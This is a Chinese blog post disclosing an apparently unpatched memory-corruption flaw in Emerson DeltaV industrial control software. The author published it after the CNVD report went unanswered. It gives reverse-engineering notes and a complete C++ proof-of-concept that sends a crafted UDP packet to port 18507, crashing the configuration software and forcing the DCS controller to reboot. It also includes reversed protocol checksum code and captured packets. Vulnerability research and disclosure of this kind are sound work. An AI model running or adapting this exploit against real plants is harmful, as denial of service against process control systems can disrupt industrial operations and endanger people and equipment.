【Emerson deltaV DCS和组态软件内存越界漏洞】

已于 2023-08-14 13:55:12 修改
阅读量273 收藏
点赞数
分类专栏: 逆向 安全 文章标签: 网络 安全 物联网
于 2023-06-29 17:17:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37567738/article/details/131456337
版权

已经从原单位离职,原工作时候的漏洞没有提交给cnvd,现在闲来无事,提交了一个多月了,迟迟没有回应(估计是设备太贵了或者接触不到,cnvd没法验证该漏洞),简直就是杳无音信,不等了,伺候不起,随他去吧。

艾默生是工控行业的国际巨头之一(其他巨头还有西门子,通用电气,霍尼韦尔,三菱等),deltav产品官网:
deltav官网,下载安装后可以复现。

该漏洞应该是一个0day,漏洞触发是因为覆盖了全局地址,造成了程序不可预期的执行结果。更深一步的漏洞利用,暂时未做进一步研究。

(一) 环境

  1. emerson deltav 组态软件IP:10.4.0.6,DCS IP: 10.4.0.10,攻击机IP:10.4.0.9
  2. emerson deltav dcs 进程DVCommService.exe,漏洞代码位于comm.dll中,漏洞程序使用了udp端口18507
  3. 攻击前确保目标和攻击机之间的通信是畅通的

(二) 漏洞触发

漏洞触发时截图:
在这里插入图片描述

崩溃代码地址:comm.dll 0x20116c50函数中的偏移地址0x20116d62:
在这里插入图片描述

崩溃原因:访问了0XCDCDCDCD这个内存地址,该地址来自于攻击载荷:
在这里插入图片描述

该函数的上级调用者是oss.dll中20017B40函数(跟漏洞无直接关系):
在这里插入图片描述

(三) POC原理以及说明

通过分析,comm.dll中的201148A0函数调用recv函数,接收cmd(偏移为4)为7数据包后,进入函数0x20111B90,获取数据包偏移16的word值后,进入多个选择的分支:
在这里插入图片描述
漏洞成因是,代码将数据包第20字节开始的word值作为项数n,将第24字节开始的每4字节当作一个ip地址值,依次从数据包中取出n个ip地址,填充到从内存地址RtDeviceConnectionClassDataP + 44629开始的数组中,而RtDeviceConnectionClassDataP(偏移地址0x2014A96C)是程序运行时的一个关键的全局结构体(或类),此时,该全局地址块的数据被破坏,会导致程序执行时不可预测的结果,此处表现为内存地址越界(0xc0000005),导致DVCommService.exe崩溃。

假如修改数据包偏移16字节处的word值(假设该字段叫做subcmd),并将数据包剩余内容填入0xcd或者0xff,即可触发漏洞。

通过动态调试,发现cmd为7,subcmd为9或者0x19的数据包被接收后,会进入20111B90第184行的流程:
在这里插入图片描述
在这里插入图片描述

通过变异subcmd的值,可以多次触发类似的漏洞。比如还可以触发0x20125db2处的内存越界访问:

在这里插入图片描述

POC执行时的命令参数是ip地址,如cmd中执行:Emerson.exe 10.4.0.6。
将攻击参数改为dcs的ip地址10.4.0.10,同样会导致dcs端的crash,过段时间后将会导致dcs重启:

在这里插入图片描述

攻击代码如下:

#include <windows.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <iostream>

using namespace std;

#pragma comment(lib,"ws2_32.lib")

#pragma pack(1)

typedef struct 
{
	unsigned short flag;		//0
	unsigned short size;		//2
	unsigned short cmd;			//4
	unsigned short seq;			//6
	unsigned int tickcnt;		//8
	unsigned char v1;			//12
	unsigned char valid;		//13
	unsigned char v2;			//14
	unsigned char v3;			//15
}EMERSON_PACK_HDR;

#pragma pack()

int main(int argc,char ** argv)
{
	if (argc<2)
	{
		printf("Usage:EmersonDll.exe 10.4.0.6\r\n");
		return -1;
	}

	int result = 0;

	WSADATA wsa = { 0 };
	result = WSAStartup(0x0202, &wsa);

	SOCKET s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

	sockaddr_in saServer = { 0 };
	saServer.sin_port = ntohs(18507);
	saServer.sin_family = AF_INET;
	saServer.sin_addr.S_un.S_addr = inet_addr(argv[1]);

	char * sendbuf= new char[0x10000];
	//填充值,该值发送给组态软件后,某些偏移的值会被当做内存地址的值参与运算并保留,导致下次访问时发生内存越界异常
	memset(sendbuf, 0xff, 0x1000);

	EMERSON_PACK_HDR * lphdr = (EMERSON_PACK_HDR*)sendbuf;
	lphdr->flag = ntohs(0xface);	//flag, must be 0xface
	lphdr->cmd = ntohs(7);
	lphdr->size = ntohs(1456-16);
	lphdr->valid = 0;

	WORD * lpw = (WORD*)(sendbuf + 16);

	//除了第20,21字节的word值和lpw指向的值,其他值都参与运算但都是可以忽略的,不影响基本运行逻辑
	sendbuf[18] = 1;

	sendbuf[14] = 1;		//v2

	sendbuf[15] = ~4;		//v3 

	//此值必须不为0,否则无法触发异常
	sendbuf[20] = 0xff;
	sendbuf[21] = 0xff;

	sendbuf[22] = 0xff;
	sendbuf[23] = 0xff;

	int subcmd = 0x19;	//0x19 9
	
	//从数据包第24字节开始的dword作为ip地址,填充从RtDeviceConnectionClassDataP+ 44629开始的0xffff个dword数组
	*lpw = ntohs(subcmd);

	int len = sendto(s, (char*)sendbuf, 1456, 0, (sockaddr*)&saServer, sizeof(sockaddr));
	if (len <= 0){
		printf("sendto error,may be destination was not available\r\n");
	}
	
	delete sendbuf;

	closesocket(s);

	WSACleanup();

	return 0;
}

在这里插入图片描述

另外,此处奉上emerson网络协议中的校验和计算代码:


#include <windows.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <iostream>

using namespace std;

#pragma comment(lib,"ws2_32.lib")

#pragma pack(1)
typedef struct 
{
	unsigned short flag;
	unsigned short size;
	unsigned short cmd;
	unsigned short seq;
	unsigned int tickcnt;
	unsigned char v1;
	unsigned char valid;
	unsigned char v2;
	unsigned char v3;
}EMERSON_PACK_HDR;
#pragma pack()

extern "C" __declspec(dllexport)  unsigned short __cdecl EmersonChecksum(unsigned __int8 *a1, unsigned int a2);

#define _BYTE BYTE

#define BYTE1(x) (x>>8)

unsigned char byte_2013A508[512] = {
	0x00, 0x00, 0x89, 0x11, 0x12, 0x23, 0x9B, 0x32, 0x24, 0x46, 0xAD, 0x57, 0x36, 0x65, 0xBF, 0x74,
	0x48, 0x8C, 0xC1, 0x9D, 0x5A, 0xAF, 0xD3, 0xBE, 0x6C, 0xCA, 0xE5, 0xDB, 0x7E, 0xE9, 0xF7, 0xF8,
	0x81, 0x10, 0x08, 0x01, 0x93, 0x33, 0x1A, 0x22, 0xA5, 0x56, 0x2C, 0x47, 0xB7, 0x75, 0x3E, 0x64,
	0xC9, 0x9C, 0x40, 0x8D, 0xDB, 0xBF, 0x52, 0xAE, 0xED, 0xDA, 0x64, 0xCB, 0xFF, 0xF9, 0x76, 0xE8,
	0x02, 0x21, 0x8B, 0x30, 0x10, 0x02, 0x99, 0x13, 0x26, 0x67, 0xAF, 0x76, 0x34, 0x44, 0xBD, 0x55,
	0x4A, 0xAD, 0xC3, 0xBC, 0x58, 0x8E, 0xD1, 0x9F, 0x6E, 0xEB, 0xE7, 0xFA, 0x7C, 0xC8, 0xF5, 0xD9,
	0x83, 0x31, 0x0A, 0x20, 0x91, 0x12, 0x18, 0x03, 0xA7, 0x77, 0x2E, 0x66, 0xB5, 0x54, 0x3C, 0x45,
	0xCB, 0xBD, 0x42, 0xAC, 0xD9, 0x9E, 0x50, 0x8F, 0xEF, 0xFB, 0x66, 0xEA, 0xFD, 0xD8, 0x74, 0xC9,
	0x04, 0x42, 0x8D, 0x53, 0x16, 0x61, 0x9F, 0x70, 0x20, 0x04, 0xA9, 0x15, 0x32, 0x27, 0xBB, 0x36,
	0x4C, 0xCE, 0xC5, 0xDF, 0x5E, 0xED, 0xD7, 0xFC, 0x68, 0x88, 0xE1, 0x99, 0x7A, 0xAB, 0xF3, 0xBA,
	0x85, 0x52, 0x0C, 0x43, 0x97, 0x71, 0x1E, 0x60, 0xA1, 0x14, 0x28, 0x05, 0xB3, 0x37, 0x3A, 0x26,
	0xCD, 0xDE, 0x44, 0xCF, 0xDF, 0xFD, 0x56, 0xEC, 0xE9, 0x98, 0x60, 0x89, 0xFB, 0xBB, 0x72, 0xAA,
	0x06, 0x63, 0x8F, 0x72, 0x14, 0x40, 0x9D, 0x51, 0x22, 0x25, 0xAB, 0x34, 0x30, 0x06, 0xB9, 0x17,
	0x4E, 0xEF, 0xC7, 0xFE, 0x5C, 0xCC, 0xD5, 0xDD, 0x6A, 0xA9, 0xE3, 0xB8, 0x78, 0x8A, 0xF1, 0x9B,
	0x87, 0x73, 0x0E, 0x62, 0x95, 0x50, 0x1C, 0x41, 0xA3, 0x35, 0x2A, 0x24, 0xB1, 0x16, 0x38, 0x07,
	0xCF, 0xFF, 0x46, 0xEE, 0xDD, 0xDC, 0x54, 0xCD, 0xEB, 0xB9, 0x62, 0xA8, 0xF9, 0x9A, 0x70, 0x8B,
	0x08, 0x84, 0x81, 0x95, 0x1A, 0xA7, 0x93, 0xB6, 0x2C, 0xC2, 0xA5, 0xD3, 0x3E, 0xE1, 0xB7, 0xF0,
	0x40, 0x08, 0xC9, 0x19, 0x52, 0x2B, 0xDB, 0x3A, 0x64, 0x4E, 0xED, 0x5F, 0x76, 0x6D, 0xFF, 0x7C,
	0x89, 0x94, 0x00, 0x85, 0x9B, 0xB7, 0x12, 0xA6, 0xAD, 0xD2, 0x24, 0xC3, 0xBF, 0xF1, 0x36, 0xE0,
	0xC1, 0x18, 0x48, 0x09, 0xD3, 0x3B, 0x5A, 0x2A, 0xE5, 0x5E, 0x6C, 0x4F, 0xF7, 0x7D, 0x7E, 0x6C,
	0x0A, 0xA5, 0x83, 0xB4, 0x18, 0x86, 0x91, 0x97, 0x2E, 0xE3, 0xA7, 0xF2, 0x3C, 0xC0, 0xB5, 0xD1,
	0x42, 0x29, 0xCB, 0x38, 0x50, 0x0A, 0xD9, 0x1B, 0x66, 0x6F, 0xEF, 0x7E, 0x74, 0x4C, 0xFD, 0x5D,
	0x8B, 0xB5, 0x02, 0xA4, 0x99, 0x96, 0x10, 0x87, 0xAF, 0xF3, 0x26, 0xE2, 0xBD, 0xD0, 0x34, 0xC1,
	0xC3, 0x39, 0x4A, 0x28, 0xD1, 0x1A, 0x58, 0x0B, 0xE7, 0x7F, 0x6E, 0x6E, 0xF5, 0x5C, 0x7C, 0x4D,
	0x0C, 0xC6, 0x85, 0xD7, 0x1E, 0xE5, 0x97, 0xF4, 0x28, 0x80, 0xA1, 0x91, 0x3A, 0xA3, 0xB3, 0xB2,
	0x44, 0x4A, 0xCD, 0x5B, 0x56, 0x69, 0xDF, 0x78, 0x60, 0x0C, 0xE9, 0x1D, 0x72, 0x2F, 0xFB, 0x3E,
	0x8D, 0xD6, 0x04, 0xC7, 0x9F, 0xF5, 0x16, 0xE4, 0xA9, 0x90, 0x20, 0x81, 0xBB, 0xB3, 0x32, 0xA2,
	0xC5, 0x5A, 0x4C, 0x4B, 0xD7, 0x79, 0x5E, 0x68, 0xE1, 0x1C, 0x68, 0x0D, 0xF3, 0x3F, 0x7A, 0x2E,
	0x0E, 0xE7, 0x87, 0xF6, 0x1C, 0xC4, 0x95, 0xD5, 0x2A, 0xA1, 0xA3, 0xB0, 0x38, 0x82, 0xB1, 0x93,
	0x46, 0x6B, 0xCF, 0x7A, 0x54, 0x48, 0xDD, 0x59, 0x62, 0x2D, 0xEB, 0x3C, 0x70, 0x0E, 0xF9, 0x1F,
	0x8F, 0xF7, 0x06, 0xE6, 0x9D, 0xD4, 0x14, 0xC5, 0xAB, 0xB1, 0x22, 0xA0, 0xB9, 0x92, 0x30, 0x83,
	0xC7, 0x7B, 0x4E, 0x6A, 0xD5, 0x58, 0x5C, 0x49, 0xE3, 0x3D, 0x6A, 0x2C, 0xF1, 0x1E, 0x78, 0x0F
};

unsigned int sub_2010CDB0(DWORD v2, unsigned int a2)
{
	//int v2; // edx@1
	unsigned int v3; // esi@1
	unsigned __int16 v4; // cx@1
	unsigned int result; // eax@7

	//v2 = *(_DWORD *)(this + 28);
	v3 = *(_BYTE *)(v2 + 3) + 16 + v2 + (*(_BYTE *)(v2 + 2) << 8);
	v4 = *(_BYTE *)(v2 + 5) + (*(_BYTE *)(v2 + 4) << 8);
	if (v4 != 2 && v4 != 6 && v4 != 14 && v4 != 22 && v4 != 23)
		v3 -= 2;
	result = a2 >> 8;
	*(_BYTE *)v3 = BYTE1(a2);
	*(_BYTE *)(v3 + 1) = (BYTE)a2;
	return result;
}

unsigned short __cdecl EmersonChecksum(unsigned __int8 *a1, unsigned int a2)
{
	HMODULE h = LoadLibraryA("D:\\work\\vsproject\\test\\x64\\Release\\EmersonDll.dll");
	if (h == 0)
	{
		MessageBoxA(0, "error", "error", MB_OK);
	}
	else {
		MessageBoxA(0, "ok", "ok", MB_OK);
	}

	unsigned int v2; // esi@1
	signed int result; // eax@1
	unsigned int v4; // edx@2

	unsigned short * word_2013A508 = (unsigned short *)byte_2013A508;

	v2 = 0;
	result = 0xFFFF;
	if (a2)
	{
		do
		{
			v4 = (unsigned __int8)result ^ a1[v2++];
			result = (unsigned __int16)(word_2013A508[v4] ^ ((unsigned __int16)result >> 8));
		} while (v2 < a2);
	}

	result = ((result & 0xff) << 8) + ((result >>8)&0xff);

	return result;
}

int __stdcall DllMain(_In_ HINSTANCE hInstance, _In_ DWORD fdwReason, _In_ LPVOID lpvReserved) {

	return true;
}



void test_crc() {
	int myresult = 0;
// 	__asm {
// 		mov eax, 0xfffffff0
// 		cmp eax, 8
// 		ja __big
// 		mov eax, 0
// 
// 		jmp __toret
// 		__big :
// 		mov eax, 1
// 			__toret :
// 			mov myresult, eax
// 	}

// 	char pack0[] = 
// 		"\xfa\xce\x00\x42\x00\x02" \
// 		"\x21\x2e\x00\x01\x38\xf4\x54\x80\x04\x00\x06\x01\x00\x00\x00\x00" \
// 		"\x00\x29\x01\x68\x00\xdc\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00" \
// 		"\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x04\x00\x00\x00\x00\x00\x00" \
// 		"\x00\x00\x00\x0b\x00\x43\x00\x54\x00\x4c\x00\x52\x00\x2d\x00\x33" \
// 		"\x00\x32\x00\x44\x00\x44\x00\x39\x00\x34\x00\x00\x00\x00";	//ed7f	//830a

	unsigned char pack0[] = {
		0xfa,0xce,0x00,0x42,0x00,0x02,0x21,0x2e,0x00,0x01,0x38,0xf4,0x54,0x80,0x04,0x00,
		0x06,0x01,0x00,0x00,0x00,0x00,0x00,0x29,0x01,0x68,0x00,0xdc,0x00,0x00,0x00,0x00,
		0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0a,0x00,0x04,
		0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0b,0x00,0x43,0x00,0x54,0x00,0x4c,
		0x00,0x52,0x00,0x2d,0x00,0x33,0x00,0x32,0x00,0x44,0x00,0x44,0x00,0x39,0x00,0x34,
		0x00,0x00
	};

	char pack[] = "\xfa\xce\x00\x17\x00\x08\x04\xcb\x00\x00\x00\x00\x00\x80\x00\x00" \
		"\xda\xc5\x00\x01\x01\x01\x00\x0f\x00\x00\x00\x2d\x66\xc2\xfc\x83" \
		"\xe0\xff\xff\x8f\x80\x14\xe8";

	unsigned int crc = EmersonChecksum((unsigned char*)pack, sizeof(pack) - 1 - 2);

	unsigned int result = ((crc == 0x14e8) ? 1 : 0);

	cout << "result:" << result << endl;

	int pack0length = sizeof(pack0);

	crc = EmersonChecksum((unsigned char*)pack0, pack0length);

	char pack2[] = "\xfa\xce\x00\xb4\x00\x0e\x00\x00\xff\xff\x8a\xff\x10\x80\x00\x00" \
		"\x18\x00\x00\x00\xda\xc5\x00\x01\xc7\xf3\x75\xc8\xbb\x73\x97\x41" \
		"\x8e\x57\x88\xe8\x41\x51\x0f\x1a\x06\x06\x00\x00\x01\x02\x01\x00" \
		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x04\x00\x22" \
		"\x00\x06\x00\x23\x00\x06\x00\x27\x00\x00\x00\x00\x00\x0f\x00\x44" \
		"\x00\x45\x00\x53\x00\x4b\x00\x54\x00\x4f\x00\x50\x00\x2d\x00\x46" \
		"\x00\x33\x00\x39\x00\x53\x00\x37\x00\x4b\x00\x55\x00\x00\x01\xda" \
		"\xc5\x00\x01\x00\x00\x01\x90\x01\xd7\x52\x0e\x98\x6b\xa4\x50\x01" \
		"\xd7\x52\x0e\x8f\x0b\x17\xe0\x01\xd7\x52\x0e\x8f\x22\xec\xb9\x00" \
		"\x00\x00\x00\x00\x00\x00\x00\x01\xd7\x4e\xe9\x98\x9b\xe8\xe0\x00" \
		"\x00\x0b\xb8\x01\xd7\x52\x0e\x96\xa6\xe9\xe0\x00\x01\xd7\x52\x0e" \
		"\x90\xf1\x6c\xbd\x01\xd7\x52\x0e\x90\xc2\x69\xea\x01\xd7\x4e\xe9" \
		"\x98\x9e\x59\xe0\xfc\xb7";

	int pack2size = sizeof(pack2) - 2 - 1;
	unsigned int crc2 = EmersonChecksum((unsigned char*)pack2, sizeof(pack2) - 1 - 2);

	printf("crc:%x\r\n", crc2);

	return;
}
satadriver
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
D-Link DCS系列监控 账号密码信息泄露漏洞
weixin_51387754的博客
11-05 1087
漏洞简介 D-Link DCS-2200是一款监控摄像机,成像色彩为彩色 是一款网络摄像机, 根据VULDB 所看到的信息原文如下 A vulnerability, which was classified as problematic, was found in D-Link DCS-2530L and DCS-2670L (the affected version unknown). This affects some unknown processing of the file /config/get
艾默生 Emerson DCS DeltaV 功能模块
12-21
艾默生 Emerson DCS DeltaV 系统功能模块详解。。。。。
Emerson Deltav 7012课程 Rev 9
11-06
Deltav 7012的PPT课程,英文版 Rev9
DeltaV详细组态过程
05-19
DeltaV详细组态过程,学习艾默生DCS系统的资料,有助于快速了解DeitaV系统。
霍尼韦尔 Experion DCS 和 QuickBlox 服务中存在多个严重漏洞
smellycat000的专栏
07-17 568
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Armis 公司的研究人员在霍尼韦尔 (Honeywell) Experion DCS 平台上发现了9个漏洞,如遭成功利用可导致受影响系统遭严重攻陷。这9个漏洞被统称为 “Crit.IX”。这些漏洞可导致“越权远程代码执行后果,意味着攻击者可接管设备并修改 DCS 控制器的运营,使负责管理控制器的工程工作站无法看到这些修改。”换句话说,这些漏洞与...
deltav控制系统基本功能组态步骤
12-24
deltav控制系统基本功能组态步骤,希望对大家能够有用
CNVD-2021-29075:D-Link DCS-4622 监控账号密码泄露漏洞
Foreverlove112的博客
09-07 1013
CNVD-2021-29075:D-Link DCS-4622 监控账号密码泄露漏洞复现
Emerson DeltaV 网络智能开关
w15305925923的博客
06-11 179
称为 -用途定制 "的商用组件,这些交换机将现成组件的低成本组件与 DeltaV 专用软件和功能相结合,使其在控制网络中更具集成性和即插即用性。VE6042 和 VE6043DeltaV SmartSwitch:安装在 DIN 导轨上的模块化交换机,使用有线和光纤通信模块支持 8、16 或 24 个端口。VE6046、VE6047 和 VE6048 DeltaV 智能交换机:19 "机架式 8、16 或 24 端口模块化交换机,带有线和光纤连接以及 2 个千兆位有线或光纤上行链路。全系列交换机硬件配置。
EMERSON DeltaV™ SX 控制器
w15305925923的博客
07-09 246
DeltaV™ SX 控制器提供通信和控制功能,并集成现场设备和控制网络上的其他节点。只需用 SX 控制器替换 SD Plus 或 SQ 控制器,所有现有的配置、文档和硬件设计都将保持不变。SX 控制器具有 M 系列控制器的所有特性和功能,包括支持基于 CHARM 的电子调试。SX 控制器支持您所期待的 DeltaV 系统的所有功能:自寻址、自动 I/O 检测。承载架可卡入标准 DIN 导轨,控制器和 S 系列 IO 可卡入定位,无需使用固定螺钉。同步系统时钟,可在整个系统中执行基于时间的事件驱动操作。
DeltaVDeltaV软件硬件教程
01-29
DeltaV系统是Emerson Process Management公司推出的一种先进的分布式控制系统(DCS),广泛应用于石油、化工、制药等工业领域。这个“DeltaV软件硬件教程”涵盖了该系统的各个方面,旨在帮助用户深入理解和掌握其...
Emerson DELTAV系统说明书
05-29
Emerson DELTAV系统是Emerson过程管理公司推出的一款先进的分布式控制系统(DCS),广泛应用于石油、化工、制药、电力等工业领域,旨在提供高效、可靠的过程控制解决方案。以下是对DELTA系统的几个关键知识点的详细...
Emerson Deltav 7009课程
12-28
Emerson Deltav 7009课程是针对Emerson公司的先进分布式控制系统(DCS)——DeltaV系统的一个专业培训课程。DeltaV系统是全球工业自动化领域的领军产品,广泛应用于石油天然气、化工、制药、食品饮料等多个行业。该...
Emerson DeltaV SIS 逻辑求解器
w15305925923的博客
06-04 309
DeltaV SIS 系统是艾默生智能 SIS 的一部分、 开创了新一代安全仪表系统(SIS)。这种智能 SIS 方法利用预测性现场智能的力量,提高了整个安全仪表功能的可用性。Emerson DeltaV SIS 逻辑求解器。逻辑解算器与DeltaV 控制器之间的通信故障。逻辑解算器与SISnet 之间的通信故障。轻松符合 IEC 61511 标准。一对冗余逻辑运算机之间的通信故障。全球首款智能 SIS 逻辑解算器。每个逻辑解算器的输入数据相同。逻辑解算器内部的硬件故障。逻辑解决程序之间的通信故障。
Emerson DeltaV™ Smart Switches 即插即用型工业交换机
xmkjkj1102的博客
04-25 515
作为 Emerson 的产品,这些 DeltaV 网络开关在 DeltaV 网络中使用时,将得到 Emerson 的全面支持。启动交换机后,DeltaV 交换机调试应用程序会在网络设备指挥中心(以前的智能交换机指挥中心)中自动发现交换机。网络地址由 DeltaV DCS 自动分配,或者在 DeltaV 2.5 网络中安装时由用户自动分配(DeltaV v13.3 中新增)。新一代 DeltaV 智能开关采用与 DeltaV 兼容的设置,开箱即可安装到兼容的 DeltaV 网络中。
工控安全漏洞举例
为智慧地球添砖加瓦
02-13 5553
先来几个工控设备的漏洞栗子: 1.      协议漏洞 a)      CP1W-C1F41模块的HTTP协议存在拒绝服务漏洞。通过客户端与CP1W-C1F41的80端口建立链接后,向其发送异常字符串“: ”(注:冒号后有空格),可导致CP1W-C1F41的HTTP服务异常,80端口无法再访问。需手动重启PLC,HTTP服务方能恢复。 b)     Cisco IOS是美国思科(Cisco)
D-Link DCS系列监控账号密码信息泄露
The current road is different, love needs to distinguish between right and wrong
11-18 1722
简介: 漏洞编号:CVE-2020-25078 D-Link DCS网络监控摄像机设备,通过访问特定的URL可以得到账号密码信息,攻击方可以 直接进入利用漏洞得到账户密码直接进入后台获取视频监控页面。 影响版本: DCS-2530L DCS-2670L DCS-4603 DCS-4622 DCS-4701E DCS-4703E DCS-4705E DCS-4802E DCS-P703 漏洞复现: fofa直接搜索: app="D_Link-DCS-2530L" 可以看到还
网安科班精选!爱荷华大学教授的网络安全零基础入门教程!
互联网架构小马的博客
07-31 513
网络就像一把双刃剑,给我们的生活、交流、工作和发展带来了便利,但同时也给信息安全以及个人隐私带来了威胁。网络和信息安全问题不仅影响了网络的普及和应用,还关系到企国家、军队、企业的信息安全和社会的经济安全,让人又爱又恨。今天给大家分享的这份手册,主要从网络漏洞、协议和安全解决方案等方面来探讨网络安全问题。我们把网络看成是不安全安全的源头,通过分析网络漏洞、探测、攻击和减少攻击的方法,来研究不同的网络协议。
J031_使用TCP协议支持与多个客户端同时通信
最新发布
lzn20161229的博客
08-03 175
使用TCP协议支持与多个客户端同时通信。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值